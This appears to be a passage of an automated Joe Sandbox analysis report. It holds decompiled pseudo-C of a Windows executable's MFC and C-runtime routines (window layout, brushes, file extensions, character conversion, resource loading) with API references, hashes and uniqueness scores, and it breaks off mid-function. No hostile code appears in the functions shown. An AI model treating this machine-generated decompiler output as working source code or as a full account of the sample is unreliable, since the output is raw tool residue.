                  				RECT* _t135;
                  				intOrPtr _t137;
                  				intOrPtr _t139;
                  				intOrPtr _t140;
                  				signed int _t145;
                  				void* _t146;
                  
                  				_t133 = __edx;
                  				_t109 = __ecx;
                  				_t143 = _t145;
                  				_t146 = _t145 - 0x234;
                  				_t58 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t58 ^ _t145;
                  				_t139 = _a4;
                  				_t135 = _a8;
                  				_t107 = __ecx;
                  				_v548 = _t139;
                  				_v552 = _t135;
                  				if(__ecx == 0) {
                  					L2:
                  					E00413DD0(_t109);
                  				}
                  				if(_t139 == 0) {
                  					goto L2;
                  				}
                  				_t62 = GetWindowRect( *(_t139 + 0x20),  &_v568);
                  				if( *((intOrPtr*)(_t139 + 0x90)) != _t107 || _t135 != 0 && EqualRect( &_v568, _t135) == 0) {
                  					if( *((intOrPtr*)(_t107 + 0x98)) != 0 && ( *(_t139 + 0x88) & 0x00000040) != 0) {
                  						 *(_t107 + 0x84) =  *(_t107 + 0x84) | 0x00000040;
                  					}
                  					 *(_t107 + 0x84) =  *(_t107 + 0x84) & 0xfffffff9;
                  					_t65 =  *(_t139 + 0x84) & 0x00000006 |  *(_t107 + 0x84);
                  					 *(_t107 + 0x84) = _t65;
                  					_t157 = _t65 & 0x00000040;
                  					if((_t65 & 0x00000040) == 0) {
                  						_push(0x104);
                  						_push( &_v528);
                  						E00411F38(_t107, _t139, _t135, _t139, _t157);
                  						E004208C1(_t139, _t133,  *((intOrPtr*)(_t107 + 0x20)),  &_v528);
                  					}
                  					_t70 = ( *(_t139 + 0x84) ^  *(_t107 + 0x84)) & 0x0000f000 ^  *(_t139 + 0x84) | 0x00000f00;
                  					if( *((intOrPtr*)(_t107 + 0x98)) == 0) {
                  						_t71 = _t70 & 0xfffffffe;
                  						__eflags = _t70 & 0xfffffffe;
                  					} else {
                  						_t71 = _t70 | 0x00000001;
                  					}
                  					E00422C07(_t139, _t71);
                  					_t136 = E0041B7F3(_t107, GetDlgCtrlID( *(_t139 + 0x20)), 0xffffffff);
                  					if(_t136 > 0) {
                  						 *((intOrPtr*)(E00415D21(_t107, _t107 + 0x9c, _t136, _t136))) = _t139;
                  					}
                  					if(_v552 == 0) {
                  						__eflags = _t136 - 1;
                  						if(_t136 < 1) {
                  							_t136 = _t107 + 0x9c;
                  							E0041B59E(_t107 + 0x9c, _t139);
                  							E0041B59E(_t107 + 0x9c, 0);
                  						}
                  						_t113 =  *0x44fc24; // 0x2
                  						_push(0x115);
                  						__eflags = 0;
                  						_push(0);
                  						_push(0);
                  						_push( ~_t113);
                  						_t115 =  *0x44fc20; // 0x2
                  						_push( ~_t115);
                  						_push(0);
                  					} else {
                  						E00406B80( &_v544, _v552);
                  						E004144FC(_t107,  &_v544);
                  						if(_t136 < 1) {
                  							asm("cdq");
                  							asm("cdq");
                  							_push((_v532 - _v540 - _t133 >> 1) + _v540);
                  							_push((_v536 - _v544 - _t133 >> 1) + _v544);
                  							_t136 = _t146 - 0x10;
                  							_push(_v548);
                  							asm("movsd");
                  							asm("movsd");
                  							asm("movsd");
                  							asm("movsd");
                  							E0041B858(_t107);
                  							_t139 = _v548;
                  						}
                  						_push(0x114);
                  						_push(_v532 - _v540);
                  						_push(_v536 - _v544);
                  						_push(_v540);
                  						_push(_v544);
                  						_push(0);
                  					}
                  					E00411EB6(_t139);
                  					if(E0040E20E(_t107, _t139, GetParent( *(_t139 + 0x20))) != _t107) {
                  						E0041B5D2(_t139, _t107);
                  					}
                  					_t118 =  *((intOrPtr*)(_t139 + 0x90));
                  					if( *((intOrPtr*)(_t139 + 0x90)) != 0) {
                  						E0041BC28(_t118, _t136, _t139, 0xffffffff, 0);
                  					}
                  					 *((intOrPtr*)(_t139 + 0x90)) = _t107;
                  					 *(E004159C1(_t107) + 0xe4) =  *(_t62 + 0xe4) | 0x0000000c;
                  				}
                  				_pop(_t137);
                  				_pop(_t140);
                  				_pop(_t108);
                  				return E00427DFF(_t62, _t108, _v8 ^ _t143, _t133, _t137, _t140);
                  			}

                  APIs
                  • GetWindowRect.USER32(?,?), ref: 0041C679
                  • EqualRect.USER32(?,?), ref: 0041C697
                  • GetDlgCtrlID.USER32(?), ref: 0041C73C
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 00411EB6: SetWindowPos.USER32(69614D43,00000000,0044B1B0,00000000,00000115,00000000,00000000), ref: 00411EDE
                  • GetParent.USER32(?), ref: 0041C854
                    • Part of subcall function 0041B5D2: SetParent.USER32(69614D43,00000000), ref: 0041B5E5
                  Similarity
                  • API ID: ParentRectWindow$CtrlEqualException@8Throw
                  • String ID:
                  • API String ID: 1228987742-0
                  • Opcode ID: 30ae872368c63dfb4a6948823f63c272eb78bf086c384f51f9b22b82a1736bc9
                  • Instruction ID: 13f66cee3fcb6d317c2e126614bfb2d7dc02196cb67fed68aae7235a7cc27c22
                  • Opcode Fuzzy Hash: 30ae872368c63dfb4a6948823f63c272eb78bf086c384f51f9b22b82a1736bc9
                  • Instruction Fuzzy Hash: 6861E5716402199BCB24EF68CDC9BEA73B9BF44304F0045AEE919D7291CB78AD85CB58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 80%
                  			E00424C4D(void* __ecx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				struct tagRECT _v40;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t60;
                  				signed int _t65;
                  				intOrPtr _t67;
                  				signed int _t73;
                  				void* _t76;
                  				void* _t80;
                  				void* _t84;
                  				intOrPtr _t85;
                  
                  				_t76 = __ecx;
                  				_v24 = 1;
                  				_v20 = 1;
                  				_t85 = E00414924(__ecx, __ecx, _t80, _t84, __eflags, GetStockObject(0));
                  				_v16 = _t85;
                  				_v8 = E00421B6B(_t76, _t80, _t85, __eflags);
                  				_t60 =  *(_t76 + 0x74);
                  				_v12 = _t85;
                  				if((0x0000a000 & _t60) == 0) {
                  					__eflags = _t60 & 0x00005000;
                  					if(__eflags == 0) {
                  						_v24 = GetSystemMetrics(0x20) - 1;
                  						_v20 = GetSystemMetrics(0x21) - 1;
                  						_t65 =  *(_t76 + 0x78);
                  						__eflags = 0x0000a000 & _t65;
                  						if((0x0000a000 & _t65) == 0) {
                  							L6:
                  							__eflags = _t65 & 0x00005000;
                  							if(__eflags == 0) {
                  								L9:
                  							} else {
                  								__eflags =  *(_t76 + 0x7c);
                  								if(__eflags == 0) {
                  									goto L9;
                  								} else {
                  									goto L8;
                  								}
                  							}
                  						} else {
                  							__eflags =  *(_t76 + 0x7c);
                  							if(__eflags != 0) {
                  								goto L6;
                  							}
                  						}
                  						_v12 = _v8;
                  					} else {
                  					}
                  				} else {
                  				}
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				if(_a4 != 0) {
                  					_v20 = 0;
                  					_v24 = 0;
                  				}
                  				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
                  					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                  				}
                  				_t67 = _v8;
                  				_t97 =  *(_t76 + 0x24);
                  				if( *(_t76 + 0x24) == 0) {
                  					_t67 = _v16;
                  				}
                  				E00421CD5(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                  				asm("movsd");
                  				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                  				asm("movsd");
                  				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                  				asm("movsd");
                  				_t73 = 0 | _v12 == _v8;
                  				asm("movsd");
                  				 *(_t76 + 0x24) = _t73;
                  				return _t73;
                  			}

                  APIs
                  • GetStockObject.GDI32(00000000), ref: 00424C65
                    • Part of subcall function 00421B6B: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00421BB3
                    • Part of subcall function 00421B6B: CreatePatternBrush.GDI32(00000000), ref: 00421BC0
                    • Part of subcall function 00421B6B: DeleteObject.GDI32(00000000), ref: 00421BCC
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00424D01
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                  • String ID:
                  • API String ID: 3923860780-0
                  • Opcode ID: af61000ef48e1c6df06a44ee16b59bc6ba0a0ecf5b2466b17b0e7beb40c98814
                  • Instruction ID: c31f29e0610201e6aadbcfe8af86ab14c293c7618f31593165d0ab73f11540cb
                  • Opcode Fuzzy Hash: af61000ef48e1c6df06a44ee16b59bc6ba0a0ecf5b2466b17b0e7beb40c98814
                  • Instruction Fuzzy Hash: 00415971E01628DFCF11CFA9D984AAE7BB4EF48310F510166ED10AB296D3789E41DF94
                  Uniqueness

                  Uniqueness Score: 16.53%

                  C-Code - Quality: 90%
                  			E004134AC(void* __ebx, signed int __ecx, int __edi, void* __esi, void* __eflags) {
                  				signed int _t44;
                  				WCHAR* _t54;
                  				WCHAR* _t60;
                  				void* _t65;
                  				signed int _t72;
                  				short* _t81;
                  				signed int _t84;
                  				signed int _t91;
                  				void* _t93;
                  
                  				_t89 = __edi;
                  				_push(8);
                  				E0042922B(E00438CC7, __ebx, __edi, __esi);
                  				_t91 = __ecx;
                  				 *(_t93 - 0x14) = 0;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					_t72 =  *(__ecx + 0x74);
                  					__eflags =  *(_t72 + 0x34) & 0x00080000;
                  					if(( *(_t72 + 0x34) & 0x00080000) == 0) {
                  						L14:
                  						_t44 =  *(_t91 + 0x318);
                  						__eflags = _t44;
                  						if(_t44 == 0) {
                  							__eflags =  *(_t72 + 0x3a);
                  							if(__eflags == 0) {
                  								goto L16;
                  							} else {
                  								_t91 = _t72;
                  								goto L20;
                  							}
                  						} else {
                  							__eflags =  *(_t44 + 0x3a);
                  							if(__eflags != 0) {
                  								_t91 = _t44;
                  								L20:
                  								_push( *((intOrPtr*)(_t91 + 0x1c)) + ( *(_t91 + 0x3a) & 0x0000ffff) * 2);
                  							} else {
                  								L16:
                  								_push(0x43de78);
                  							}
                  						}
                  						E00410F00(0,  *((intOrPtr*)(_t93 + 8)), _t89, _t91, __eflags);
                  					} else {
                  						__eflags =  *(__ecx + 0x20);
                  						if(__eflags == 0) {
                  							goto L14;
                  						} else {
                  							E00404820(_t93 - 0x10);
                  							_t89 = 0x104;
                  							 *((intOrPtr*)(_t93 - 4)) = 3;
                  							 *(_t93 - 0x14) = E00405860(_t93 - 0x10, __eflags, 0x104);
                  							_t54 = SendMessageW( *(E0040E20E(0, _t93 - 0x10, GetParent( *(_t91 + 0x20))) + 0x20), 0x464, 0x104,  *(_t93 - 0x14));
                  							_t92 = _t54;
                  							E0040E100(0, _t93 - 0x10, 0x104, 0xffffffff);
                  							__eflags = _t54;
                  							if(__eflags < 0) {
                  								goto L9;
                  							} else {
                  								goto L5;
                  							}
                  							L23:
                  						}
                  					}
                  				} else {
                  					E00404820(_t93 - 0x10);
                  					 *((intOrPtr*)(_t93 - 4)) = 0;
                  					_t84 = _t91;
                  					_push(_t93 - 0x14);
                  					_t96 =  *(_t91 + 0x20);
                  					if( *(_t91 + 0x20) == 0) {
                  						_t65 = E004131FC(0, _t84, __edi, _t91, __eflags);
                  						 *((char*)(_t93 - 4)) = 2;
                  					} else {
                  						_t65 = E004133B9(0, _t84, __edi, _t91, _t96);
                  						 *((char*)(_t93 - 4)) = 1;
                  					}
                  					E00405630(_t93 - 0x10, _t96, _t65);
                  					 *((char*)(_t93 - 4)) = 0;
                  					E004055F0( *(_t93 - 0x14) + 0xfffffff0);
                  					E0040E100(0, _t93 - 0x10, _t89, 0xffffffff);
                  					L5:
                  					_t92 =  *(_t93 - 0x10);
                  					_t60 = PathFindExtensionW(_t92);
                  					if(_t60 == 0 ||  *_t60 != 0x2e) {
                  						L9:
                  						E004057B0(0, _t93 - 0x10, _t89, _t92, __eflags);
                  						E00405590( *((intOrPtr*)(_t93 + 8)), __eflags, _t93 - 0x10);
                  						_t81 =  &(( *(_t93 - 0x10))[0xfffffffffffffff8]);
                  					} else {
                  						_push( &(_t60[1]));
                  						E00410F00(0,  *((intOrPtr*)(_t93 + 8)), _t89, _t92,  &(_t60[1]));
                  						_t81 = _t92 - 0x10;
                  					}
                  					E004055F0(_t81);
                  				}
                  				return E00429303( *((intOrPtr*)(_t93 + 8)));
                  				goto L23;
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004134B3
                  • PathFindExtensionW.SHLWAPI(?), ref: 00413518
                  • GetParent.USER32(?), ref: 00413591
                  • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 004135A9
                    • Part of subcall function 004133B9: __EH_prolog3.LIBCMT ref: 004133C0
                    • Part of subcall function 004133B9: CoTaskMemFree.OLE32(00000000), ref: 00413404
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: H_prolog3$ExtensionFindFreeMessageParentPathSendTask
                  • String ID:
                  • API String ID: 3379981378-0
                  • Opcode ID: 9b93f53f14f25e835fc708482236e89f8439d2e25500a765c0606f8c38f8f421
                  • Instruction ID: e9548ffd1dfc07055ed96a7418aa3e12d6266e14c49f839bbf957048701678d7
                  • Opcode Fuzzy Hash: 9b93f53f14f25e835fc708482236e89f8439d2e25500a765c0606f8c38f8f421
                  • Instruction Fuzzy Hash: AB41CE71900215EBCB24EFA5C8859EFB7B5BF04708F50092EF112672D1DB38AA85CB59
                  Uniqueness

                  Uniqueness Score: 37.75%

                  C-Code - Quality: 100%
                  			E00433731(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				char _v8;
                  				signed int _v12;
                  				char _v20;
                  				char _t43;
                  				char _t46;
                  				signed int _t53;
                  				signed int _t54;
                  				intOrPtr _t56;
                  				int _t57;
                  				int _t58;
                  				signed short* _t59;
                  				short* _t60;
                  				int _t65;
                  				char* _t73;
                  
                  				_t73 = _a8;
                  				if(_t73 == 0 || _a12 == 0) {
                  					L5:
                  					return 0;
                  				} else {
                  					if( *_t73 != 0) {
                  						E004284D3( &_v20, __edi, _a16);
                  						_t43 = _v20;
                  						__eflags =  *(_t43 + 0x14);
                  						if( *(_t43 + 0x14) != 0) {
                  							_t46 = E00433862( *_t73 & 0x000000ff,  &_v20);
                  							__eflags = _t46;
                  							if(_t46 == 0) {
                  								__eflags = _a4;
                  								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                  								if(__eflags != 0) {
                  									L10:
                  									__eflags = _v8;
                  									if(_v8 != 0) {
                  										_t53 = _v12;
                  										_t11 = _t53 + 0x70;
                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                  										__eflags =  *_t11;
                  									}
                  									return 1;
                  								}
                  								L21:
                  								_t54 = E00429429(__eflags);
                  								 *_t54 = 0x2a;
                  								__eflags = _v8;
                  								if(_v8 != 0) {
                  									_t54 = _v12;
                  									_t33 = _t54 + 0x70;
                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                  									__eflags =  *_t33;
                  								}
                  								return _t54 | 0xffffffff;
                  							}
                  							_t56 = _v20;
                  							_t65 =  *(_t56 + 0xac);
                  							__eflags = _t65 - 1;
                  							if(_t65 <= 1) {
                  								L17:
                  								__eflags = _a12 -  *(_t56 + 0xac);
                  								if(__eflags < 0) {
                  									goto L21;
                  								}
                  								__eflags = _t73[1];
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								L19:
                  								_t57 =  *(_t56 + 0xac);
                  								__eflags = _v8;
                  								if(_v8 == 0) {
                  									return _t57;
                  								}
                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                  								return _t57;
                  							}
                  							__eflags = _a12 - _t65;
                  							if(_a12 < _t65) {
                  								goto L17;
                  							}
                  							__eflags = _a4;
                  							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                  							__eflags = _t58;
                  							_t56 = _v20;
                  							if(_t58 != 0) {
                  								goto L19;
                  							}
                  							goto L17;
                  						}
                  						_t59 = _a4;
                  						__eflags = _t59;
                  						if(_t59 != 0) {
                  							 *_t59 =  *_t73 & 0x000000ff;
                  						}
                  						goto L10;
                  					} else {
                  						_t60 = _a4;
                  						if(_t60 != 0) {
                  							 *_t60 = 0;
                  						}
                  						goto L5;
                  					}
                  				}
                  			}

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00433765
                  • __isleadbyte_l.LIBCMT ref: 00433799
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0042897C,?,00000000,00000000,?,?,?,?,0042897C,00000000,?), ref: 004337CA
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0042897C,00000001,00000000,00000000,?,?,?,?,0042897C,00000000,?), ref: 00433838
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 74406c40e01131864d5d4bcba5a5eff69e05688d71a6245307a39176d35a87f4
                  • Instruction ID: 94c1967e72314dfb6f68f9f79a209869cb912ef53028721ba2a795084eb0ff20
                  • Opcode Fuzzy Hash: 74406c40e01131864d5d4bcba5a5eff69e05688d71a6245307a39176d35a87f4
                  • Instruction Fuzzy Hash: CF31F2B0A00246EFDF14DF64C8859BB3BA1BF09312F1495AAF4618B291D334DE40DB59
                  Uniqueness

                  Uniqueness Score: 0.05%

                  C-Code - Quality: 96%
                  			E00417D6B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t30;
                  				struct HWND__* _t33;
                  				char* _t34;
                  				struct HWND__* _t55;
                  				struct HWND__** _t64;
                  				void* _t65;
                  				struct HWND__** _t69;
                  				intOrPtr _t71;
                  
                  				_push(0x20c);
                  				E00429294(E00438EDF, __ebx, __edi, __esi);
                  				_t64 =  *(_t65 + 0xc);
                  				_t30 =  *((intOrPtr*)(_t65 + 0x10));
                  				_t69 = _t64;
                  				_t52 = 0 | _t69 == 0x00000000;
                  				 *((intOrPtr*)(_t65 - 0x218)) = _t30;
                  				if(_t69 == 0) {
                  					L1:
                  					_t30 = E00413DD0(_t52);
                  				}
                  				_t71 = _t30;
                  				_t52 = 0 | _t71 != 0x00000000;
                  				if(_t71 != 0) {
                  					goto L1;
                  				}
                  				E00404820(_t65 - 0x214);
                  				_t55 = _t64[2];
                  				_t33 = _t64[1];
                  				 *((intOrPtr*)(_t65 - 4)) = 0;
                  				if(_t55 != 0xfffffdf8 || (_t64[0x19] & 0x00000001) == 0) {
                  					if(_t55 == 0xfffffdee && (_t64[0x2d] & 0x00000001) != 0) {
                  						goto L7;
                  					}
                  				} else {
                  					L7:
                  					_t33 = GetDlgCtrlID(_t33);
                  				}
                  				if(_t33 == 0) {
                  					L12:
                  					_t34 =  &(_t64[4]);
                  					if(_t64[2] != 0xfffffdf8) {
                  						E0041594E(_t34, 0x50,  *(_t65 - 0x214), 0xffffffff);
                  					} else {
                  						WideCharToMultiByte(3, 0,  *(_t65 - 0x214), 0xffffffff, _t34, 0x50, 0, 0);
                  					}
                  					 *((intOrPtr*)( *((intOrPtr*)(_t65 - 0x218)))) = 0;
                  					SetWindowPos( *_t64, 0, 0, 0, 0, 0, 0x213);
                  					E004055F0( &(( *(_t65 - 0x214))[0xfffffffffffffff8]));
                  				} else {
                  					if(E004152FF(0xfffffdf8, _t65 - 0x210, 0, _t64, _t33, _t65 - 0x210, 0x100) != 0) {
                  						E00415372(0xfffffdf8, 0, _t65 - 0x214, _t65 - 0x210, 1, 0xa);
                  						goto L12;
                  					} else {
                  						E004055F0( &(( *(_t65 - 0x214))[0xfffffffffffffff8]));
                  					}
                  				}
                  				return E00429317(0xfffffdf8, 0, _t64);
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00417D75
                  • GetDlgCtrlID.USER32(?), ref: 00417DDA
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,00000000,0000020C), ref: 00417E3B
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00417E6A
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ByteCharCtrlException@8H_prolog3_MultiThrowWideWindow
                  • String ID:
                  • API String ID: 2836953783-0
                  • Opcode ID: 61fcc3095c7373b74f420a1abb7586d02774f24e348145ed8ab378800d5f7111
                  • Instruction ID: 577e202f51eb493e17409dd941570777497b560100243f005a7691c43b21384c
                  • Opcode Fuzzy Hash: 61fcc3095c7373b74f420a1abb7586d02774f24e348145ed8ab378800d5f7111
                  • Instruction Fuzzy Hash: B4310830A44709ABCB20AB24DC89FEF73B5AF50310F10069EF526A62D1DB749DC0CB19
                  Uniqueness

                  Uniqueness Score: 2.71%

                  C-Code - Quality: 82%
                  			E00421388(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                  				void* __ebx;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t29;
                  				intOrPtr _t32;
                  				intOrPtr _t35;
                  				intOrPtr _t36;
                  				intOrPtr _t37;
                  				signed int _t39;
                  				void* _t47;
                  				intOrPtr* _t48;
                  				void* _t50;
                  				void* _t51;
                  				void* _t64;
                  				void* _t65;
                  				intOrPtr _t66;
                  				void* _t68;
                  				void* _t70;
                  
                  				_t65 = __edi;
                  				_t64 = __edx;
                  				_t51 = E00420870(_t50, __ecx, __edi, _t68, __eflags);
                  				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                  				if(_t29 == 0) {
                  					L19:
                  					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                  				}
                  				_t32 = _t29 - 1;
                  				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                  				if(_t32 != 0) {
                  					goto L19;
                  				}
                  				if(_a4 == 0) {
                  					L8:
                  					_push(_t65);
                  					_t66 =  *((intOrPtr*)(E0042083D(_t51, _t65, 0, _t77) + 4));
                  					_t70 = E0041F05B(0x44fa10);
                  					if(_t70 == 0 || _t66 == 0) {
                  						L18:
                  						goto L19;
                  					} else {
                  						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                  						_t80 = _t35;
                  						if(_t35 == 0) {
                  							L12:
                  							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                  								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                  								_a4 = _a4 & 0x00000000;
                  								_t83 = _t36;
                  								if(_t36 != 0) {
                  									_push(_t36);
                  									_t39 = E0042B47A(_t51, _t64, _t66, _t70, _t83);
                  									_push( *((intOrPtr*)(_t70 + 0xc)));
                  									_a4 = _t39;
                  									E00428397(_t51, _t66, _t70, _t83);
                  								}
                  								_t37 = E004282CD(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
                  								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                  								if(_t37 == 0 && _a4 != _t37) {
                  									 *((intOrPtr*)(_t70 + 0xc)) = E004282CD(_t51, _t64, _t66, _a4);
                  								}
                  							}
                  							goto L18;
                  						}
                  						_push(_t35);
                  						if(E0042B47A(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                  							goto L18;
                  						}
                  						goto L12;
                  					}
                  				}
                  				if(_a4 != 0xffffffff) {
                  					_t47 = E0041D6AB();
                  					if(_t47 != 0) {
                  						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                  						_t77 = _t48;
                  						if(_t48 != 0) {
                  							 *_t48(0, 0);
                  						}
                  					}
                  				}
                  				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
                  				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
                  				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
                  				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
                  				E004212B5(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
                  				goto L8;
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __msize_malloc
                  • String ID:
                  • API String ID: 1288803200-0
                  • Opcode ID: 07fc8dd952d4e8a5f23b7088429bc3348371d158590f4848f08d352337202d60
                  • Instruction ID: 320e6f8a8d1a5bf3ac5580cffa25b4515132b49a173ca4041c9242e5c46b9f15
                  • Opcode Fuzzy Hash: 07fc8dd952d4e8a5f23b7088429bc3348371d158590f4848f08d352337202d60
                  • Instruction Fuzzy Hash: 3E21A2307006309BCB25BF35E881B6B7795AF10354B94866FF85CCA266DB38DC51CAD8
                  Uniqueness

                  Uniqueness Score: 2.71%

                  C-Code - Quality: 86%
                  			E00419F37(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags, WCHAR* _a4) {
                  				intOrPtr _v8;
                  				void* _v12;
                  				void* __esi;
                  				void* __ebp;
                  				struct HRSRC__* _t28;
                  				void* _t29;
                  				void* _t30;
                  				signed int _t35;
                  				void* _t44;
                  				signed short* _t58;
                  				signed int _t60;
                  				void* _t65;
                  				void* _t67;
                  				struct HINSTANCE__* _t68;
                  				void* _t70;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_push(_t67);
                  				_v8 = __ecx;
                  				_t68 =  *(E0042083D(__ebx, __edi, _t67, __eflags) + 0xc);
                  				_t28 = FindResourceW(_t68, _a4, 0xf1);
                  				if(_t28 != 0) {
                  					_t29 = LoadResource(_t68, _t28);
                  					_v12 = _t29;
                  					__eflags = _t29;
                  					if(_t29 == 0) {
                  						goto L1;
                  					} else {
                  						_t70 = LockResource(_t29);
                  						__eflags = _t70;
                  						if(__eflags == 0) {
                  							goto L1;
                  						} else {
                  							_t32 =  *(_t70 + 6) & 0x0000ffff;
                  							_push(__ebx);
                  							_push(__edi);
                  							_t60 = 4;
                  							_t61 = ( *(_t70 + 6) & 0x0000ffff) * _t60 >> 0x20;
                  							_t65 = E0040B71F(__eflags,  ~(0 | __eflags > 0x00000000) | _t32 * _t60);
                  							_t35 = 0;
                  							__eflags = 0 -  *(_t70 + 6);
                  							if(0 <  *(_t70 + 6)) {
                  								_t13 = _t70 + 8; // 0x8
                  								_t58 = _t13;
                  								do {
                  									 *(_t65 + _t35 * 4) =  *_t58 & 0x0000ffff;
                  									_t61 =  *(_t70 + 6) & 0x0000ffff;
                  									_t35 = _t35 + 1;
                  									_t58 =  &(_t58[1]);
                  									__eflags = _t35 - ( *(_t70 + 6) & 0x0000ffff);
